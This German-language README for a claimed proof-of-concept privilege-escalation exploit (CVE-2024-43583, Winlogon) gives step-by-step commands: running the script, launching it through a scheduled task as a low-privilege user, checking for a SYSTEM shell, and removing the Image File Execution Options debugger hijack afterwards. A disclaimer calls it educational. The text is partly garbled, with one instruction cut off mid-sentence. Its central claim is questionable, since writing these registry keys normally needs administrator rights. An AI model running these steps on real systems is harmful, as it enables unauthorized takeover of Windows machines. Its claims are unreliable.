
Proof of Concept für CVE-2024-43583
Author: No0B@ckSappi3 Instagram: No0BackSappi3
CVE-2024-43583 ist eine Erhöhung von Privilegien-Sicherheitslücke, die Microsofts Winlogon-Komponente betrifft. Die Ausnutzung dieser Sicherheitslücke ermöglicht es einem Benutzer mit niedrigen Berechtigungen, seine Privilegien auf SYSTEM zu erhöhen, was zu einer vollständigen Systemkompromittierung führt.
Dieser Proof-of-Concept (PoC) nutzt Debugger-Hijacking über den Windows-Registrierungsschlüssel Image File Execution Options (IFEO) aus, um einen legitimen Systemprozess durch eine schädliche Nutzlast zu ersetzen.
Betroffene Windows-Versionen
Windows 10 (1507 - 22H2) Windows 11 (21H2 - 24H2) Windows Server 2008 SP2 - 2022
Dieser Exploit dient ausschließlich Lehr- und Forschungszwecken. Verwenden Sie ihn nicht auf nicht autorisierten Systemen. Missbrauch dieses Exploits kann illegal sein.
Stellen Sie sicher, dass Python auf dem Zielsystem installiert ist. Falls nicht, verwenden Sie die kompilierte .exe-Version.
python poc-43583.py
schtasks /create /tn "LowPrivExploit" /tr "C:\Path\To\python.exe C:\Path\To\poc-43583.py" /sc once /st 00:00 /ru lowpriv /f
schtasks /run /tn "LowPrivExploit"
Strg + Umschalt + Esc). Bei Erfolg erscheint stattdessen eine SYSTEM-Shell.Sobald der Exploit ausgeführt wird, überprüfen Sie Ihre Berechtigungen:
whoami
Erwartete Ausgabe:
nt authority\system
Führen Sie das Skript erneut aus und wählen Sie Option [2], um das Hijacking zu entfernen.
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f
schtasks /delete /tn "LowPrivExploit" /f
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"